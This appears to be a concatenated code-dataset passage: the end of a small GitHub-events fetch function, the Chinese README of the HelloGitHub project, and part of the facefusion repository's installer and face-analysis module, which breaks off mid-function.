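    response = requests.get(
        url,
        params={"page": page},
        headers={"Authorization": f"token {GITHUB_TOKEN}"},
        timeout=10,
    )
    response.raise_for_status()
    return response.json()  # at most 30 events per page, 300 events in total

print(len(get_received_events(1)))
```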
<p align="center"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/readme.gif"/> <br>中文 | <a href="README_en.md">English</a> | <a href="README_ja.md">日本語</a> <br>分享 GitHub 上有趣、入门级的开源项目。<br>兴趣是最好的老师,这里能够帮你找到编程的兴趣! </p> <p align="center"> <a href="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/weixin.png"><img src="https://img.shields.io/badge/Talk-%E5%BE%AE%E4%BF%A1%E7%BE%A4-brightgreen.svg?style=popout-square" alt="WeiXin"></a> <a href="https://github.com/521xueweihan/HelloGitHub/stargazers"><img src="https://img.shields.io/github/stars/521xueweihan/HelloGitHub.svg?style=popout-square" alt="GitHub stars"></a> <a href="https://github.com/521xueweihan/HelloGitHub/issues"><img src="https://img.shields.io/github/issues/521xueweihan/HelloGitHub.svg?style=popout-square" alt="GitHub issues"></a> <a href="https://weibo.com/hellogithub"><img src="https://img.shields.io/badge/%E6%96%B0%E6%B5%AA-Weibo-red.svg?style=popout-square" alt="Sina Weibo"></a> </p> ## 简介 HelloGitHub 分享 GitHub 上有趣、入门级的开源项目。**每月 28 号**以月刊的形式[更新发布](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzA5MzYyNzQ0MQ==&action=getalbum&album_id=1331197538447310849#wechat_redirect),内容包括:**有趣、入门级的开源项目**、**开源书籍**、**实战项目**、**企业级项目**等,让你用很短时间感受到开源的魅力,爱上开源! ## 内容 获得更好的阅读体验 [官网](https://hellogithub.com/) 或 [HelloGitHub 公众号](https://cdn.jsdelivr.net/gh/521xueweihan/img_logo@main/logo/weixin.png) | :card_index: | :jack_o_lantern: | :beer: | :fish_cake: | :octocat: | | ------- | ----- | ------------ | ------ | --------- | | [第 101 期](/content/HelloGitHub101.md) | | [第 100 期](/content/HelloGitHub100.md) | [第 99 期](/content/HelloGitHub99.md) | [第 98 期](/content/HelloGitHub98.md) | [第 97 期](/content/HelloGitHub97.md) | [第 96 期](/content/HelloGitHub96.md) | | [第 95 期](/content/HelloGitHub95.md) | [第 94 期](/content/HelloGitHub94.md) | [第 93 期](/content/HelloGitHub93.md) | [第 92 期](/content/HelloGitHub92.md) | [第 91 期](/content/HelloGitHub91.md) | | [第 90 期](/content/HelloGitHub90.md) | [第 89 期](/content/HelloGitHub89.md) | [第 88 期](/content/HelloGitHub88.md) | [第 87 期](/content/HelloGitHub87.md) | [第 86 期](/content/HelloGitHub86.md) | | [第 85 期](/content/HelloGitHub85.md) | [第 84 期](/content/HelloGitHub84.md) | [第 83 期](/content/HelloGitHub83.md) | [第 82 期](/content/HelloGitHub82.md) | [第 81 期](/content/HelloGitHub81.md) | | [第 80 期](/content/HelloGitHub80.md) | [第 79 期](/content/HelloGitHub79.md) | [第 78 期](/content/HelloGitHub78.md) | [第 77 期](/content/HelloGitHub77.md) | [第 76 期](/content/HelloGitHub76.md) | | [第 75 期](/content/HelloGitHub75.md) | [第 74 期](/content/HelloGitHub74.md) | [第 73 期](/content/HelloGitHub73.md) | [第 72 期](/content/HelloGitHub72.md) | [第 71 期](/content/HelloGitHub71.md) | | [第 70 期](/content/HelloGitHub70.md) | [第 69 期](/content/HelloGitHub69.md) | [第 68 期](/content/HelloGitHub68.md) | [第 67 期](/content/HelloGitHub67.md) | [第 66 期](/content/HelloGitHub66.md) | 欢迎[推荐或自荐](https://hellogithub.com/periodical)项目成为 **HelloGitHub** 的[贡献者](https://github.com/521xueweihan/HelloGitHub/blob/master/content/contributors.md) ## 赞助 <table> <thead> <tr> <th align="center" style="width: 80px;"> <a href="https://www.ucloud.cn/site/active/gpu.html?utm_term=logo&utm_campaign=hellogithub&utm_source=otherdsp&utm_medium=display&ytag=logo_hellogithub_otherdsp_display"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/ucloud.png" width="60px"><br> <sub>UCloud</sub><br> <sub>超值的GPU云服务</sub> </a> </th> <th align="center" style="width: 80px;"> <a 
href="https://www.upyun.com/?from=hellogithub"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/upyun.png" width="60px"><br> <sub>CDN</sub><br> <sub>开启全网加速</sub> </a> </th> <th align="center" style="width: 80px;"> <a href="https://github.com/OpenIMSDK/Open-IM-Server"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/im.png" width="60px"><br> <sub>OpenIM</sub><br> <sub>开源IM力争No.1</sub> </a> </th> <th align="center" style="width: 80px;"> <a href="https://apifox.cn/a103hello"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/apifox.png" width="60px"><br> <sub>Apifox</sub><br> <sub>比 Postman 更强大</sub> </a> </th> </tr> </thead> </table> ## 声明 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh"><img alt="知识共享许可协议" style="border-width: 0" src="https://licensebuttons.net/l/by-nc-nd/4.0/88x31.png"></a><br>本作品采用 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh">署名-非商业性使用-禁止演绎 4.0 国际</a> 进行许可。<a href="mailto:[email protected]">联系我</a>
facefusion
57016d7c778c70f58fc54c49013d57179874a505
File: run.py #!/usr/bin/env python3 from facefusion import core if __name__ == '__main__': core.cli() File: install.py #!/usr/bin/env python3 import os import subprocess os.environ['PIP_BREAK_SYSTEM_PACKAGES'] = '1' subprocess.call([ 'pip', 'install', 'inquirer', '-q' ]) from facefusion import installer if __name__ == '__main__': installer.cli() File: facefusion/face_analyser.py from typing import Any, Optional, List, Tuple from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals from facefusion import process_manager from facefusion.common_helper import get_first from facefusion.face_helper import estimate_matrix_by_face_landmark_5, warp_face_by_face_landmark_5, warp_face_by_translation, create_static_anchors, distance_to_face_landmark_5, distance_to_bounding_box, convert_face_landmark_68_to_5, apply_nms, categorize_age, categorize_gender from facefusion.face_store import get_static_faces, set_static_faces from facefusion.execution import apply_execution_provider_options from facefusion.download import conditional_download from facefusion.filesystem import resolve_relative_path, is_file from facefusion.thread_helper import thread_lock, thread_semaphore, conditional_thread_semaphore from facefusion.typing import VisionFrame, Face, FaceSet, FaceAnalyserOrder, FaceAnalyserAge, FaceAnalyserGender, ModelSet, BoundingBox, FaceLandmarkSet, FaceLandmark5, FaceLandmark68, Score, FaceScoreSet, Embedding from facefusion.vision import resize_frame_resolution, unpack_resolution FACE_ANALYSER = None MODELS : ModelSet =\ { 'face_detector_retinaface': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/retinaface_10g.onnx', 'path': resolve_relative_path('../.assets/models/retinaface_10g.onnx') }, 'face_detector_scrfd': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/scrfd_2.5g.onnx', 'path': resolve_relative_path('../.assets/models/scrfd_2.5g.onnx') }, 'face_detector_yoloface': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/yoloface_8n.onnx', 'path': resolve_relative_path('../.assets/models/yoloface_8n.onnx') }, 'face_detector_yunet': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/yunet_2023mar.onnx', 'path': resolve_relative_path('../.assets/models/yunet_2023mar.onnx') }, 'face_recognizer_arcface_blendswap': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/arcface_w600k_r50.onnx', 'path': resolve_relative_path('../.assets/models/arcface_w600k_r50.onnx') }, 'face_recognizer_arcface_inswapper': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/arcface_w600k_r50.onnx', 'path': resolve_relative_path('../.assets/models/arcface_w600k_r50.onnx') }, 'face_recognizer_arcface_simswap': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/arcface_simswap.onnx', 'path': resolve_relative_path('../.assets/models/arcface_simswap.onnx') }, 'face_recognizer_arcface_uniface': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/arcface_w600k_r50.onnx', 'path': resolve_relative_path('../.assets/models/arcface_w600k_r50.onnx') }, 'face_landmarker_68': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/2dfan4.onnx', 'path': resolve_relative_path('../.assets/models/2dfan4.onnx') }, 'face_landmarker_68_5': { 'url': 
'https://github.com/facefusion/facefusion-assets/releases/download/models/face_landmarker_68_5.onnx', 'path': resolve_relative_path('../.assets/models/face_landmarker_68_5.onnx') }, 'gender_age': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gender_age.onnx', 'path': resolve_relative_path('../.assets/models/gender_age.onnx') } } def get_face_analyser() -> Any: global FACE_ANALYSER face_detectors = {} face_landmarkers = {} with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FACE_ANALYSER is None: if facefusion.globals.face_detector_model in [ 'many', 'retinaface' ]: face_detectors['retinaface'] = onnxruntime.InferenceSession(MODELS.get('face_detector_retinaface').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_detector_model in [ 'many', 'scrfd' ]: face_detectors['scrfd'] = onnxruntime.InferenceSession(MODELS.get('face_detector_scrfd').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_detector_model in [ 'many', 'yoloface' ]: face_detectors['yoloface'] = onnxruntime.InferenceSession(MODELS.get('face_detector_yoloface').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_detector_model in [ 'yunet' ]: face_detectors['yunet'] = cv2.FaceDetectorYN.create(MODELS.get('face_detector_yunet').get('path'), '', (0, 0)) if facefusion.globals.face_recognizer_model == 'arcface_blendswap': face_recognizer = onnxruntime.InferenceSession(MODELS.get('face_recognizer_arcface_blendswap').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_recognizer_model == 'arcface_inswapper': face_recognizer = onnxruntime.InferenceSession(MODELS.get('face_recognizer_arcface_inswapper').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_recognizer_model == 'arcface_simswap': face_recognizer = onnxruntime.InferenceSession(MODELS.get('face_recognizer_arcface_simswap').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_recognizer_model == 'arcface_uniface': face_recognizer = onnxruntime.InferenceSession(MODELS.get('face_recognizer_arcface_uniface').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) face_landmarkers['68'] = onnxruntime.InferenceSession(MODELS.get('face_landmarker_68').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) face_landmarkers['68_5'] = onnxruntime.InferenceSession(MODELS.get('face_landmarker_68_5').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) gender_age = onnxruntime.InferenceSession(MODELS.get('gender_age').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) FACE_ANALYSER =\ { 'face_detectors': face_detectors, 
'face_recognizer': face_recognizer, 'face_landmarkers': face_landmarkers, 'gender_age': gender_age } return FACE_ANALYSER def clear_face_analyser() -> Any: global FACE_ANALYSER FACE_ANALYSER = None def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_urls =\ [ MODELS.get('face_landmarker_68').get('url'), MODELS.get('face_landmarker_68_5').get('url'), MODELS.get('gender_age').get('url') ] model_paths =\ [ MODELS.get('face_landmarker_68').get('path'), MODELS.get('face_landmarker_68_5').get('path'), MODELS.get('gender_age').get('path') ] if facefusion.globals.face_detector_model in [ 'many', 'retinaface' ]: model_urls.append(MODELS.get('face_detector_retinaface').get('url')) model_paths.append(MODELS.get('face_detector_retinaface').get('path')) if facefusion.globals.face_detector_model in [ 'many', 'scrfd' ]: model_urls.append(MODELS.get('face_detector_scrfd').get('url')) model_paths.append(MODELS.get('face_detector_scrfd').get('path')) if facefusion.globals.face_detector_model in [ 'many', 'yoloface' ]: model_urls.append(MODELS.get('face_detector_yoloface').get('url')) model_paths.append(MODELS.get('face_detector_yoloface').get('path')) if facefusion.globals.face_detector_model in [ 'yunet' ]: model_urls.append(MODELS.get('face_detector_yunet').get('url')) model_paths.append(MODELS.get('face_detector_yunet').get('path')) if facefusion.globals.face_recognizer_model == 'arcface_blendswap': model_urls.append(MODELS.get('face_recognizer_arcface_blendswap').get('url')) model_paths.append(MODELS.get('face_recognizer_arcface_blendswap').get('path')) if facefusion.globals.face_recognizer_model == 'arcface_inswapper': model_urls.append(MODELS.get('face_recognizer_arcface_inswapper').get('url')) model_paths.append(MODELS.get('face_recognizer_arcface_inswapper').get('path')) if facefusion.globals.face_recognizer_model == 'arcface_simswap': model_urls.append(MODELS.get('face_recognizer_arcface_simswap').get('url')) model_paths.append(MODELS.get('face_recognizer_arcface_simswap').get('path')) if facefusion.globals.face_recognizer_model == 'arcface_uniface': model_urls.append(MODELS.get('face_recognizer_arcface_uniface').get('url')) model_paths.append(MODELS.get('face_recognizer_arcface_uniface').get('path')) if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, model_urls) process_manager.end() return all(is_file(model_path) for model_path in model_paths) def detect_with_retinaface(vision_frame : VisionFrame, face_detector_size : str) -> Tuple[List[BoundingBox], List[FaceLandmark5], List[Score]]: face_detector = get_face_analyser().get('face_detectors').get('retinaface') face_detector_width, face_detector_height = unpack_resolution(face_detector_size) temp_vision_frame = resize_frame_resolution(vision_frame, (face_detector_width, face_detector_height)) ratio_height = vision_frame.shape[0] / temp_vision_frame.shape[0] ratio_width = vision_frame.shape[1] / temp_vision_frame.shape[1] feature_strides = [ 8, 16, 32 ] feature_map_channel = 3 anchor_total = 2 bounding_box_list = [] face_landmark_5_list = [] score_list = [] detect_vision_frame = prepare_detect_frame(temp_vision_frame, face_detector_size) with thread_semaphore(): detections = face_detector.run(None, { face_detector.get_inputs()[0].name: detect_vision_frame }) for index, feature_stride in enumerate(feature_strides): keep_indices = numpy.where(detections[index] >= facefusion.globals.face_detector_score)[0] if keep_indices.any(): stride_height = 
face_detector_height // feature_stride stride_width = face_detector_width // feature_stride anchors = create_static_anchors(feature_stride, anchor_total, stride_height, stride_width) bounding_box_raw = detections[index + feature_map_channel] * feature_stride face_landmark_5_raw = detections[index + feature_map_channel * 2] * feature_stride for bounding_box in distance_to_bounding_box(anchors, bounding_box_raw)[keep_indices]: bounding_box_list.append(numpy.array( [ bounding_box[0] * ratio_width, bounding_box[1] * ratio_height, bounding_box[2] * ratio_width, bounding_box[3] * ratio_height ])) for face_landmark_5 in distance_to_face_landmark_5(anchors, face_landmark_5_raw)[keep_indices]: face_landmark_5_list.append(face_landmark_5 * [ ratio_width, ratio_height ]) for score in detections[index][keep_indices]: score_list.append(score[0]) return bounding_box_list, face_landmark_5_list, score_list def detect_with_scrfd(vision_frame : VisionFrame, face_detector_size : str) -> Tuple[List[BoundingBox], List[FaceLandmark5], List[Score]]: face_detector = get_face_analyser().get('face_detectors').get('scrfd') face_detector_width, face_detector_height = unpack_resolution(face_detector_size) temp_vision_frame = resize_frame_resolution(vision_frame, (face_detector_width, face_detector_height)) ratio_height = vision_frame.shape[0] / temp_vision_frame.shape[0] ratio_width = vision_frame.shape[1] / temp_vision_frame.shape[1] feature_strides = [ 8, 16, 32 ] feature_map_channel = 3 anchor_total = 2 bounding_box_list = [] face_landmark_5_list = [] score_list = [] detect_vision_frame = prepare_detect_frame(temp_vision_frame, face_detector_size) with thread_semaphore(): detections = face_detector.run(None, { face_detector.get_inputs()[0].name: detect_vision_frame }) for index, feature_stride in enumerate(feature_strides): keep_indices = numpy.where(detections[index] >= facefusion.globals.face_detector_score)[0] if keep_indices.any(): stride_height = face_detector_height // feature_stride stride_width = face_detector_width // feature_stride anchors = create_static_anchors(feature_stride, anchor_total, stride_height, stride_width) bounding_box_raw = detections[index + feature_map_channel] * feature_stride face_landmark_5_raw = detections[index + feature_map_channel * 2] * feature_stride for bounding_box in distance_to_bounding_box(anchors, bounding_box_raw)[keep_indices]: bounding_box_list.append(numpy.array( [ bounding_box[0] * ratio_width, bounding_box[1] * ratio_height, bounding_box[2] * ratio_width, bounding_box[3] * ratio_height ])) for face_landmark_5 in distance_to_face_landmark_5(anchors, face_landmark_5_raw)[keep_indices]: face_landmark_5_list.append(face_landmark_5 * [ ratio_width, ratio_height ]) for score in detections[index][keep_indices]: score_list.append(score[0]) return bounding_box_list, face_landmark_5_list, score_list def detect_with_yoloface(vision_frame : VisionFrame, face_detector_size : str) -> Tuple[List[BoundingBox], List[FaceLandmark5], List[Score]]: face_detector = get_face_analyser().get('face_detectors').get('yoloface') face_detector_width, face_detector_height = unpack_resolution(face_detector_size) temp_vision_frame = resize_frame_resolution(vision_frame, (face_detector_width, face_detector_height)) ratio_height = vision_frame.shape[0] / temp_vision_frame.shape[0] ratio_width = vision_frame.shape[1] / temp_vision_frame.shape[1] bounding_box_list = [] face_landmark_5_list = [] score_list = [] detect_vision_frame = prepare_detect_frame(temp_vision_frame, face_detector_size) with 
thread_semaphore(): detections = face_detector.run(None, { face_detector.get_inputs()[0].name: detect_vision_frame }) detections = numpy.squeeze(detections).T bounding_box_raw, score_raw, face_landmark_5_raw = numpy.split(detections, [ 4, 5 ], axis = 1) keep_indices = numpy.where(score_raw > facefusion.globals.face_detector_score)[0] if keep_indices.any(): bounding_box_raw, face_landmark_5_raw, score_raw = bounding_box_raw[keep_indices], face_landmark_5_raw[keep_indices], score_raw[keep_indices] for bounding_box in bounding_box_raw: bounding_box_list.append(numpy.array( [ (bounding_box[0] - bounding_box[2] / 2) * ratio_width, (bounding_box[1] - bounding_box[3] / 2) * ratio_height, (bounding_box[0] + bounding_box[2] / 2) * ratio_width, (bounding_box[1] + bounding_box[3] / 2) * ratio_height ])) face_landmark_5_raw[:, 0::3] = (face_landmark_5_raw[:, 0::3]) * ratio_width face_landmark_5_raw[:, 1::3] = (face_landmark_5_raw[:, 1::3]) * ratio_height for face_landmark_5 in face_landmark_5_raw: face_landmark_5_list.append(numpy.array(face_landmark_5.reshape(-1, 3)[:, :2])) score_list = score_raw.ravel().tolist() return bounding_box_list, face_landmark_5_list, score_list def detect_with_yunet(vision_frame : VisionFrame, face_detector_size : str) -> Tuple[List[BoundingBox], List[FaceLandmark5], List[Score]]: face_detector = get_face_analyser().get('face_detectors').get('yunet') face_detector_width, face_detector_height = unpack_resolution(face_detector_size) temp_vision_frame = resize_frame_resolution(vision_frame, (face_detector_width, face_detector_height)) ratio_height = vision_frame.shape[0] / temp_vision_frame.shape[0] ratio_width = vision_frame.shape[1] / temp_vision_frame.shape[1] bounding_box_list = [] face_landmark_5_list = [] score_list = [] face_detector.setInputSize((temp_vision_frame.shape[1], temp_vision_frame.shape[0])) face_detector.setScoreThreshold(facefusion.globals.face_detector_score) with thread_semaphore(): _, detections = face_detector.detect(temp_vision_frame) if numpy.any(detections): for detection in detections: bounding_box_list.append(numpy.array( [ detection[0] * ratio_width, detection[1] * ratio_height, (detection[0] + detection[2]) * ratio_width, (detection[1] + detection[3]) * ratio_height ])) face_landmark_5_list.append(detection[4:14].reshape((5, 2)) * [ ratio_width, ratio_height ]) score_list.append(detection[14]) return bounding_box_list, face_landmark_5_list, score_list def prepare_detect_frame(temp_vision_frame : VisionFrame, face_detector_size : str) -> VisionFrame: face_detector_width, face_detector_height = unpack_resolution(face_detector_size) detect_vision_frame = numpy.zeros((face_detector_height, face_detector_width, 3)) detect_vision_frame[:temp_vision_frame.shape[0], :temp_vision_frame.shape[1], :] = temp_vision_frame detect_vision_frame = (detect_vision_frame - 127.5) / 128.0 detect_vision_frame = numpy.expand_dims(detect_vision_frame.transpose(2, 0, 1), axis = 0).astype(numpy.float32) return detect_vision_frame def create_faces(vision_frame : VisionFrame, bounding_box_list : List[BoundingBox], face_landmark_5_list : List[FaceLandmark5], score_list : List[Score]) -> List[Face]: faces = [] if facefusion.globals.face_detector_score > 0: sort_indices = numpy.argsort(-numpy.array(score_list)) bounding_box_list = [ bounding_box_list[index] for index in sort_indices ] face_landmark_5_list = [face_landmark_5_list[index] for index in sort_indices] score_list = [ score_list[index] for index in sort_indices ] iou_threshold = 0.1 if 
facefusion.globals.face_detector_model == 'many' else 0.4 keep_indices = apply_nms(bounding_box_list, iou_threshold) for index in keep_indices: bounding_box = bounding_box_list[index] face_landmark_5_68 = face_landmark_5_list[index] face_landmark_68_5 = expand_face_landmark_68_from_5(face_landmark_5_68) face_landmark_68 = face_landmark_68_5 face_landmark_68_score = 0.0 if facefusion.globals.face_landmarker_score > 0: face_landmark_68, face_landmark_68_score = detect_face_landmark_68(vision_frame, bounding_box) if face_landmark_68_score > facefusion.globals.face_landmarker_score: face_landmark_5_68 = convert_face_landmark_68_to_5(face_landmark_68) landmarks : FaceLandmarkSet =\ { '5': face_landmark_5_list[index], '5/68': face_landmark_5_68, '68': face_landmark_68, '68/5': face_landmark_68_5 } scores : FaceScoreSet = \ { 'detector': score_list[index], 'landmarker': face_landmark_68_score } embedding, normed_embedding = calc_embedding(vision_frame, landmarks.get('5/68')) gender, age = detect_gender_age(vision_frame, bounding_box) faces.append(Face( bounding_box = bounding_box, landmarks = landmarks, scores = scores, embedding = embedding, normed_embedding = normed_embedding, gender = gender, age = age )) return faces def calc_embedding(temp_vision_frame : VisionFrame, face_landmark_5 : FaceLandmark5) -> Tuple[Embedding, Embedding]: face_recognizer = get_face_analyser().get('face_recognizer') crop_vision_frame, matrix = warp_face_by_face_landmark_5(temp_vision_frame, face_landmark_5, 'arcface_112_v2', (112, 112)) crop_vision_frame = crop_vision_frame / 127.5 - 1 crop_vision_frame = crop_vision_frame[:, :, ::-1].transpose(2, 0, 1).astype(numpy.float32) crop_vision_frame = numpy.expand_dims(crop_vision_frame, axis = 0) with conditional_thread_semaphore(facefusion.globals.execution_providers): embedding = face_recognizer.run(None, { face_recognizer.get_inputs()[0].name: crop_vision_frame })[0] embedding = embedding.ravel() normed_embedding = embedding / numpy.linalg.norm(embedding) return embedding, normed_embedding def detect_face_landmark_68(temp_vision_frame : VisionFrame, bounding_box : BoundingBox) -> Tuple[FaceLandmark68, Score]: face_landmarker = get_face_analyser().get('face_landmarkers').get('68') scale = 195 / numpy.subtract(bounding_box[2:], bounding_box[:2]).max() translation = (256 - numpy.add(bounding_box[2:], bounding_box[:2]) * scale) * 0.5 crop_vision_frame, affine_matrix = warp_face_by_translation(temp_vision_frame, translation, scale, (256, 256)) crop_vision_frame = cv2.cvtColor(crop_vision_frame, cv2.COLOR_RGB2Lab) if numpy.mean(crop_vision_frame[:, :, 0]) < 30: crop_vision_frame[:, :, 0] = cv2.createCLAHE(clipLimit = 2).apply(crop_vision_frame[:, :, 0]) crop_vision_frame = cv2.cvtColor(crop_vision_frame, cv2.COLOR_Lab2RGB) crop_vision_frame = crop_vision_frame.transpose(2, 0, 1).astype(numpy.float32) / 255.0 with conditional_thread_semaphore(facefusion.globals.execution_providers): face_landmark_68, face_heatmap = face_landmarker.run(None, { face_landmarker.get_inputs()[0].name: [ crop_vision_frame ] }) face_landmark_68 = face_landmark_68[:, :, :2][0] / 64 face_landmark_68 = face_landmark_68.reshape(1, -1, 2) * 256 face_landmark_68 = cv2.transform(face_landmark_68, cv2.invertAffineTransform(affine_matrix)) face_landmark_68 = face_landmark_68.reshape(-1, 2) face_landmark_68_score = numpy.amax(face_heatmap, axis = (2, 3)) face_landmark_68_score = numpy.mean(face_landmark_68_score) return face_landmark_68, face_landmark_68_score def expand_face_landmark_68_from_5(face_landmark_5 
: FaceLandmark5) -> FaceLandmark68: face_landmarker = get_face_analyser().get('face_landmarkers').get('68_5') affine_matrix = estimate_matrix_by_face_landmark_5(face_landmark_5, 'ffhq_512', (1, 1)) face_landmark_5 = cv2.transform(face_landmark_5.reshape(1, -1, 2), affine_matrix).reshape(-1, 2) with conditional_thread_semaphore(facefusion.globals.execution_providers): face_landmark_68_5 = face_landmarker.run(None, { face_landmarker.get_inputs()[0].name: [ face_landmark_5 ] })[0][0] face_landmark_68_5 = cv2.transform(face_landmark_68_5.reshape(1, -1, 2), cv2.invertAffineTransform(affine_matrix)).reshape(-1, 2) return face_landmark_68_5 def detect_gender_age(temp_vision_frame : VisionFrame, bounding_box : BoundingBox) -> Tuple[int, int]: gender_age = get_face_analyser().get('gender_age') bounding_box = bounding_box.reshape(2, -1) scale = 64 / numpy.subtract(*bounding_box[::-1]).max() translation = 48 - bounding_box.sum(axis = 0) * scale * 0.5 crop_vision_frame, affine_matrix = warp_face_by_translation(temp_vision_frame, translation, scale, (96, 96)) crop_vision_frame = crop_vision_frame[:, :, ::-1].transpose(2, 0, 1).astype(numpy.float32) crop_vision_frame = numpy.expand_dims(crop_vision_frame, axis = 0) with conditional_thread_semaphore(facefusion.globals.execution_providers): prediction = gender_age.run(None, { gender_age.get_inputs()[0].name: crop_vision_frame })[0][0] gender = int(numpy.argmax(prediction[:2])) age = int(numpy.round(prediction[2] * 100)) return gender, age def get_one_face(vision_frame : VisionFrame, position : int = 0) -> Optional[Face]: many_faces = get_many_faces(vision_frame) if many_faces: try: return many_faces[position] except IndexError: return many_faces[-1] return None def get_average_face(vision_frames : List[VisionFrame], position : int = 0) -> Optional[Face]: average_face = None faces = [] embedding_list = [] normed_embedding_list = [] for vision_frame in vision_frames: face = get_one_face(vision_frame, position) if face: faces.append(face) embedding_list.append(face.embedding) normed_embedding_list.append(face.normed_embedding) if faces: first_face = get_first(faces) average_face = Face( bounding_box = first_face.bounding_box, landmarks = first_face.landmarks, scores = first_face.scores, embedding = numpy.mean(embedding_list, axis = 0), normed_embedding = numpy.mean(normed_embedding_list, axis = 0), gender = first_face.gender, age = first_face.age ) return average_face def get_many_faces(vision_frame : VisionFrame) -> List[Face]: faces = [] try: faces_cache = get_static_faces(vision_frame) if faces_cache: faces = faces_cache else: bounding_box_list = [] face_landmark_5_list = [] score_list = [] if facefusion.globals.face_detector_model in [ 'many', 'retinaface']: bounding_box_list_retinaface, face_landmark_5_list_retinaface, score_list_retinaface = detect_with_retinaface(vision_frame, facefusion.globals.face_detector_size) bounding_box_list.extend(bounding_box_list_retinaface) face_landmark_5_list.extend(face_landmark_5_list_retinaface) score_list.extend(score_list_retinaface) if facefusion.globals.face_detector_model in [ 'many', 'scrfd' ]: bounding_box_list_scrfd, face_landmark_5_list_scrfd, score_list_scrfd = detect_with_scrfd(vision_frame, facefusion.globals.face_detector_size) bounding_box_list.extend(bounding_box_list_scrfd) face_landmark_5_list.extend(face_landmark_5_list_scrfd) score_list.extend(score_list_scrfd) if facefusion.globals.face_detector_model in [ 'many', 'yoloface' ]: bounding_box_list_yoloface, face_landmark_5_list_yoloface, 
score_list_yoloface = detect_with_yoloface(vision_frame, facefusion.globals.face_detector_size) bounding_box_list.extend(bounding_box_list_yoloface) face_landmark_5_list.extend(face_landmark_5_list_yoloface) score_list.extend(score_list_yoloface) if facefusion.globals.face_detector_model in [ 'yunet' ]: bounding_box_list_yunet, face_landmark_5_list_yunet, score_list_yunet = detect_with_yunet(vision_frame, facefusion.globals.face_detector_size) bounding_box_list.extend(bounding_box_list_yunet) face_landmark_5_list.extend(face_landmark_5_list_yunet) score_list.extend(score_list_yunet) if bounding_box_list and face_landmark_5_list and score_list: faces = create_faces(vision_frame, bounding_box_list, face_landmark_5_list, score_list) if faces: set_static_faces(vision_frame, faces) if facefusion.globals.face_analyser_order: faces = sort_by_order(faces, facefusion.globals.face_analyser_order) if facefusion.globals.face_analyser_age: faces = filter_by_age(faces, facefusion.globals.face_analyser_age) if facefusion.globals.face_analyser_gender: faces = filter_by_gender(faces, facefusion.globals.face_analyser_gender) except (AttributeError, ValueError): pass return faces def find_similar_faces(reference_faces : FaceSet, vision_frame : VisionFrame, face_distance : float) -> List[Face]: similar_faces : List[Face] = [] many_faces = get_many_faces(vision_frame) if reference_faces: for reference_set in reference_faces: if not similar_faces: for reference_face in reference_faces[reference_set]: for face in many_faces: if compare_faces(face, reference_face, face_distance): similar_faces.append(face) return similar_faces def compare_faces(face : Face, reference_face : Face, face_distance : float) -> bool: current_face_distance = calc_face_distance(face, reference_face) return current_face_distance < face_distance def calc_face_distance(face : Face, reference_face : Face) -> float: if hasattr(face, 'normed_embedding') and hasattr(reference_face, 'normed_embedding'): return 1 - numpy.dot(face.normed_embedding, reference_face.normed_embedding) return 0 def sort_by_order(faces : List[Face], order : FaceAnalyserOrder) -> List[Face]: if order == 'left-right': return sorted(faces, key = lambda face: face.bounding_box[0]) if order == 'right-left': return sorted(faces, key = lambda face: face.bounding_box[0], reverse = True) if order == 'top-bottom': return sorted(faces, key = lambda face: face.bounding_box[1]) if order == 'bottom-top': return sorted(faces, key = lambda face: face.bounding_box[1], reverse = True) if order == 'small-large': return sorted(faces, key = lambda face: (face.bounding_box[2] - face.bounding_box[0]) * (face.bounding_box[3] - face.bounding_box[1])) if order == 'large-small': return sorted(faces, key = lambda face: (face.bounding_box[2] - face.bounding_box[0]) * (face.bounding_box[3] - face.bounding_box[1]), reverse = True) if order == 'best-worst': return sorted(faces, key = lambda face: face.scores.get('detector'), reverse = True) if order == 'worst-best': return sorted(faces, key = lambda face: face.scores.get('detector')) return faces def filter_by_age(faces : List[Face], age : FaceAnalyserAge) -> List[Face]: filter_faces = [] for face in faces: if categorize_age(face.age) == age: filter_faces.append(face) return filter_faces def filter_by_gender(faces : List[Face], gender : FaceAnalyserGender) -> List[Face]: filter_faces = [] for face in faces: if 